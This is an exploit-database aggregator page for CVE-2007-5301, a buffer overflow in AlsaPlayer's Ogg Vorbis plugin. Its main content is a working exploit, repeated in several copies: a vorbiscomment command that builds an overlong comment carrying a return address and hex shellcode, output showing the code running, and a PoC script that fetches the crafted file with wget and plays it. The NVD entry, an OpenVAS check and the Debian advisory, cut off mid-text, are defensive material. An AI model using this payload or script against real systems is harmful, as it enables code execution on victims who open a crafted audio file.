Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit
2008-04-10T00:00:00
ID EDB-ID:5424 Type exploitdb Reporter Albert Sellares Modified 2008-04-10T00:00:00
Description
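Exploit for the buffer overflow in the Vorbis input plugin of AlsaPlayer before 0.99.80-rc3 (CVE-2007-5301), triggered when a user opens a crafted .ogg file with an overlong comment. Listed as a local exploit for the Linux platform. Debian fixed the issue for etch in version 0.99.76-9+etch1 (DSA-1538-1).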
I have released this exploit for the alsaplayer bug CVE-2007-5301.
You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/
With my modified version of vorbiscomment, you can generate an ogg exploit like this:
whats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\x77\xe7
\xff\xff\x08\x08\x08\x08\x29\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e
\x46\x90\xbe\x13\x83\xee\xfc\xe2\xf4\x2c\x9b\xe6\x8a\x14\xf6\xd6\x3e\x25\x19\x59\x7b
\x69\xe3\xd6\x13\x2e\xbf\xdc\x7a\x28\x19\x5d\x41\xae\x9c\xbe\x13\x46\xbf\xcb\x60\x34
\xbf\xdc\x7a\x28\xbf\xd7\x77\x46\xc7\xed\x9a\xa7\x5d\x3e\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg
Then, if you play the file with the vulnerable version, the payload runs with the privileges of the user who started the player:
whats@debian:~$ alsaplayer exploit.ogg
uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
This was tested with the Debian etch packages.
- whats
# milw0rm.com [2008-04-10]
{"id": "EDB-ID:5424", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "description": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform", "published": "2008-04-10T00:00:00", "modified": "2008-04-10T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/5424/", "reporter": "Albert Sellares", "references": [], "cvelist": ["CVE-2007-5301"], "lastseen": "2016-01-31T23:06:14", "viewCount": 4, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-01-31T23:06:14", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5301"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8888", "SECURITYVULNS:DOC:19617"]}, {"type": "exploitdb", "idList": ["EDB-ID:30648"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1538-1:32D1F"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EC45CE53D720F233296DC2F925C00A11"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:65385"]}, {"type": "seebug", "idList": ["SSV:8307", "SSV:65318"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1538.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:60785"]}], "modified": "2016-01-31T23:06:14", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/5424/", "sourceData": "I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print 
\"AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\
\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-12-09T19:26:08", "description": "Buffer overflow in the vorbis_stream_info function in input/vorbis/vorbis_engine.c (aka the vorbis input plugin) in AlsaPlayer before 0.99.80-rc3 allows remote attackers to execute arbitrary code via a .OGG file with long comments.", "edition": 5, "cvss3": {}, "published": "2007-10-09T18:17:00", "title": "CVE-2007-5301", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2007-5301"], "modified": "2018-10-15T21:42:00", "cpe": ["cpe:/a:alsaplayer:alsaplayer:0.99.80-rc2"], "id": "CVE-2007-5301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5301", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:alsaplayer:alsaplayer:0.99.80-rc2:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-5301"], "description": "Hello,\r\n\r\nI have released this PoC for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\n#!/bin/sh\r\n#\r\n# http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh\r\n#\r\n# Exploit for alsaplayer before 0.99.80-rc3. Tested with the debian etch package \r\n# alsaplayer-common at version 0.99.76-9\r\n#\r\n# CVE-2007-5301 / DSA-1538\r\n# \r\n# by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\r\n# 2008-04-09\r\n#\r\n# Shellcode is based on metasploit framework. 
If you want to test it in other \r\n# systems, maybe you have to recalculate offsets.\r\n#\r\n# Example:\r\n# \r\n# whats@debian:~$ ./CVE-2007-5301-exploit.sh\r\n# Alsaplayer buffer overflow < 0.99.80-rc3\r\n# by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\r\n#\r\n#\r\n# --12:19:27-- http://www.wekk.net/research/CVE-2007-5301/exploit.ogg\r\n# => `exploit.ogg'\r\n# Resolving www.wekk.net... 64.22.71.90\r\n# Connecting to www.wekk.net|64.22.71.90|:80... connected.\r\n# HTTP request sent, awaiting response... 200 OK\r\n# Length: 5,421 (5.3K) [application/ogg]\r\n# \r\n# 100%[===============================================================================>] 5,421 \r\n# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]\r\n# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n#\r\n\r\necho -e "Alsaplayer buffer overflow < 0.99.80-rc3"\r\necho -e "by Albert Sellares <whats[at]wekk[dot]net> - http://www.wekk.net\n\n"\r\nwget http://www.wekk.net/research/CVE-2007-5301/exploit.ogg\r\nalsaplayer exploit.ogg\r\n\r\n\r\n\r\n-- \r\n Albert Sellares GPG id: 0x13053FFE\r\n http://www.wekk.net whats_up@jabber.org \r\n Membre de Catux.org http://catux.org \r\n Linux User: 324456 Catalunya \r\n", "edition": 1, "modified": "2008-04-10T00:00:00", "published": "2008-04-10T00:00:00", "id": "SECURITYVULNS:DOC:19617", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19617", "title": "[CVE-2007-5301] alsaplayer PoC - exploit", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "cvelist": ["CVE-2007-5301"], "description": "Buffer overflow on oversized .ogg comment.", "edition": 1, "modified": "2008-04-10T00:00:00", "published": "2008-04-10T00:00:00", "id": "SECURITYVULNS:VULN:8888", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8888", 
"title": "AlsaPlayer buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5301"], "description": "The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.", "modified": "2017-07-07T00:00:00", "published": "2008-04-21T00:00:00", "id": "OPENVAS:60785", "href": "http://plugins.openvas.org/nasl.php?oid=60785", "type": "openvas", "title": "Debian Security Advisory DSA 1538-1 (alsaplayer)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1538_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1538-1 (alsaplayer)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Erik Sj\u00f6lund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously-crafted Vorbis file could lead to the execution of\narbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version\n0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.\";\ntag_summary = \"The remote host is missing an update to alsaplayer\nannounced via advisory DSA 1538-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201538-1\";\n\n\nif(description)\n{\n script_id(60785);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-04-21 20:40:14 +0200 (Mon, 21 Apr 2008)\");\n script_cve_id(\"CVE-2007-5301\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1538-1 (alsaplayer)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"alsaplayer-alsa\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-xosd\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-daemon\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-jack\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-oss\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-common\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-esd\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-nas\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-gtk\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libalsaplayer0\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libalsaplayer-dev\", ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"alsaplayer-text\", 
ver:\"0.99.76-9+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:48:10", "description": "AlsaPlayer 0.99.x Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability. CVE-2007-5301. Dos exploit for linux platform", "published": "2007-10-08T00:00:00", "type": "exploitdb", "title": "AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2007-10-08T00:00:00", "id": "EDB-ID:30648", "href": "https://www.exploit-db.com/exploits/30648/", "sourceData": "source: http://www.securityfocus.com/bid/25969/info\r\n\r\nAlsaPlayer is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.\r\n\r\nExploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected application.\r\n\r\nThis issue affects versions prior to AlsaPlayer 0.99.80-rc3. 
\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/30648/"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:16", "description": "", "published": "2008-04-10T00:00:00", "type": "packetstorm", "title": "alsaplayer-overflow.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-10T00:00:00", "id": "PACKETSTORM:65385", "href": "https://packetstormsecurity.com/files/65385/alsaplayer-overflow.txt.html", "sourceData": "`I have released this exploit for the alsaplayer bug CVE-2007-5301. \n \nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/ \n \nWith my modified version of vorbiscomment, you can generate a ogg exploit like this: \n \nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7 \n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e \n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b \n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34 \n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \n \nThen, if you plays the file with the vulnerable version: \n \nwhats@debian:~$ alsaplayer exploit.ogg \nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats) \n \nThis was tested with the debian etch packages. 
\n \n- whats \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/65385/alsaplayer-overflow.txt"}], "debian": [{"lastseen": "2020-11-11T13:16:37", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5301"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1538-1 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nApril 04, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : alsaplayer\nVulnerability : buffer overrun\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2007-5301\nDebian Bug : 446034\n\nErik Sj\u00c3\u00b6lund discovered a buffer overflow vulnerability in the Ogg\nVorbis input plugin of the alsaplayer audio playback application.\nSuccessful exploitation of this vulnerability through the opening of a\nmaliciously-crafted Vorbis file could lead to the execution of\narbitrary code.\n\nFor the stable distribution (etch), the problem has been fixed in\nversion 0.99.76-9+etch1.\n\nFor the unstable distribution (sid), the problem was fixed in version\n0.99.80~rc4-1.\n\nWe recommend that you upgrade your alsaplayer packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer_0.99.76-9+etch1.dsc\n Size/MD5 
